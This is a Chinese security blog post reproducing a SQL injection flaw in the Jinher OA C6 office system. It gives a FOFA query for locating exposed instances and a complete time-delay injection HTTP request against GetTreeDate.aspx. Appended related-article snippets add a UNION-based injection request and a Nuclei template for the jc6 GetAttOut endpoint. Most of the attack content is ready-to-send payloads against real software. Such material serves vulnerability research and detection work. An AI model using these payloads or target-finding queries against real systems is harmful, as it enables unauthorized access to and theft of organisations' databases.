金和OA SQL注入漏洞

金和OAC6系统SQL注入漏洞及其检测方法
最新推荐文章于 2024-12-24 16:05:14 发布
原创 最新推荐文章于 2024-12-24 16:05:14 发布 · 890 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库

一、漏洞描述

金和OA协同办公管理系统C6软件,为北京金和网络股份有限公司 开发系统,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。

金和OA GetTreeDate.aspx接口存在SQL注入漏洞,攻击者可利用该漏洞执行任意SQL语句,获取系统数据库敏感信息。

二、网络搜索引擎搜索

fofa查询

app="金和网络-金和OA"

三、漏洞复现

时间延迟注入POC (延迟 5秒)

GET /C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1;WAITFOR+DELAY+%270:0:5%27+--%20and%201=1 HTTP/1.1
Host: IP:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=4nichsprxl5ruhtbk5lywfdb
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

四、漏洞检测

单个检测

python jinherSQLCheck.py -u url[例 http://127.0.0.1:8080]

批量检测

python jinherSQLCheck.py -f filename

关注微信公众号 网络安全透视镜 回复 20231020 获取批量检测脚本

金和OA GetTreeDate.aspx SQL注入漏洞
xiaokp7的博客
09-22 748
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞
金和OA GetSqlData.aspx 远程命令执行漏洞
xiaokp7的博客
09-13 946
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞
漏洞复现】广联达OA漏洞合集(信息泄露+SQL注入+文件上传)
李同學的安全圈
09-18 4807
广联达 Linkworks 办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。广联达OA曝出多处漏洞,攻击者可通过该漏洞获取服务器敏感数据信息,注入恶意Payload获得服务器控制权限。
漏洞复现--金和OASQL注入
qq_53003652的博客
10-23 766
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品GetTreeDate.aspx存在SQL注入漏洞sqlmap直接梭哈。
金和OA存在SQL注入漏洞
Adminhx的博客
12-24 453
金和OA存在漏洞
金和OA C6 SignUpload.ashx SQL注入漏洞复现
0xSec
09-26 729
金和OA C6 SignUpload.ashx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 DBModules.aspx SQL注入漏洞复现
0xSec
08-23 691
金和OA C6 DBModules.aspx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 GetHomeInfo SQL注入漏洞
3tefanie的博客
01-09 828
【真正的自由,从来不是了无牵挂。】
金和OA C6 jQueryUploadify.ashx SQL注入漏洞复现
0xSec
08-31 712
金和OA C6 jQueryUploadify.ashx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
{大厂漏洞 } OA产品存在SQL注入
zkaqlaoniao的博客
10-18 345
江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台,主要有知识管理,工作流程,沟通交流,辅助办公,集成解决方案,应用支撑平台,基础支撑等功能。该系统也与江苏叁拾叁智慧农业研究院的农产品电商解决方案、社会化服务解决方案、乡村振兴解决方案等进行了深度融合。该漏洞存在于login下,username对接受的传参没有进行严格的过滤,从而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。POC(payload sqlmap梭哈来的)直接sqlmap梭哈来。
漏洞通告| 某大厂OA SQL注入漏洞
2301_80115097的博客
10-27 252
广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。
通达OA SQL注入漏洞【CVE-2023-4166】
holyxp的博客
08-10 6347
通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公。漏洞2(CVE-2023-4166)general/system/seal_manage/dianju/delete_log.php文件,对参数 DELETE_STR 的操作会导致 sql 注入
黑客必知:揭秘泛微OA SQL注入漏洞,轻松入侵系统的绝佳方法!
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
08-15 690
有子曰:“其为人也孝弟,而好犯上者,鲜矣。不好犯上,而好作乱者,未之有也。君子务本,本立而道生。孝弟也者,其为仁之本与?”
漏洞复现】金和OA C6 GetMaxIndex接口SQL注入漏洞
sugxvxuysv的博客
01-25 449
金和OA C6 GetMaxIndex接口处存在SQL注入漏洞,攻击者不仅可以利用 SQL 注入漏洞获取数据库中的敏感信息,还可以向服务器中写入恶意木马或者执行命令远程下载后门,获取服务器系统权限。
金和OA任意文件读取漏洞
xiaokp7的博客
09-13 617
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用金和OA系统存在任意文件读取漏洞,攻击者通过恶意构造的请求下载服务器上的任意文件,包括敏感文件、配置文件、数据库文件等。
金和OA Servlet接口任意文件上传漏洞
故事讲予风听
12-06 960
金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
漏洞复现--金和OA clobfield SQL注入
qq_53003652的博客
12-19 1018
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品存在SQL注入漏洞
广联达OA前台sql注入+后台文件上传漏洞复现分析
博客地址 www.sec0nd.top
08-15 3362
广联达OA前台sql注入+后台文件上传漏洞复现分析
金和OA GetAttOut接口存在SQL注入漏洞
nnn2188185的博客
01-12 279
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
金和 jc6 GetAttOut SQL注入漏洞复现
最新发布
10-16
金和jc6系统GetAttOut SQL注入漏洞复现方法如下: ### 网络测绘 可使用如下关键字进行网络测绘:`app="金和网络 - 金和OA" || body="JHSoft.Web.AddMenu" || body="/jc6/platform/"` [^2]。 ### 指纹识别 通过`app=“Jinher - OA”`进行指纹识别 [^3]。 ### 漏洞请求复现 进行POST请求,示例如下: ```plaintext POST /jc6/JHSoft.WCF/TEST/GetAttOut HTTP/1.1 Host: your_ip User - Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q = 0.9,image/avif,image/webp,image/apng,*/*;q = 0.8,application/signed - exchange;v = b3;q = 0.7 Accept - Encoding: gzip, deflate Accept - Language: zh - CN,zh;q = 0.9,en;q = 0.8 Connection: close Content - Length: 149 1' union select null,CHAR(118)+CHAR(117)+CHAR(108)+ISNULL(CAST(222*3 AS NVARCHAR(4000)),CHAR(32))+CHAR(118)+CHAR(117)+CHAR(108),null,null,null,null-- ``` 此请求中插入了查询语句,可用于验证是否存在SQL注入漏洞 [^3]。 ### 使用Nuclei POC验证 可使用以下Nuclei POC进行验证: ```yaml id: jc6_GetAttOut_SQLInjection info: name: 金和 jc6 GetAttOut SQL注入漏洞 author: 0xOctober severity: high requests: - raw: - | POST /jc6/JHSoft.WCF/TEST/GetAttOut HTTP/1.1 Host: {{Hostname}} User - Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q = 0.9,image/avif,image/webp,image/apng,*/*;q = 0.8,application/signed - exchange;v = b3;q = 0.7 Accept - Encoding: gzip, deflate Accept - Language: zh - CN,zh;q = 0.9 Connection: close 1' union select null,null,@@version,null,null,null-- matchers - condition: and matchers: - type: word part: body words: - 'Microsoft SQL Server' condition: and - type: status status: - 200 ``` 若响应体中包含`Microsoft SQL Server`且状态码为200,则说明存在SQL注入漏洞 [^4]。 ### sqlmap验证 可使用sqlmap工具进一步验证该漏洞,但引用中未给出具体的sqlmap使用命令 [^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值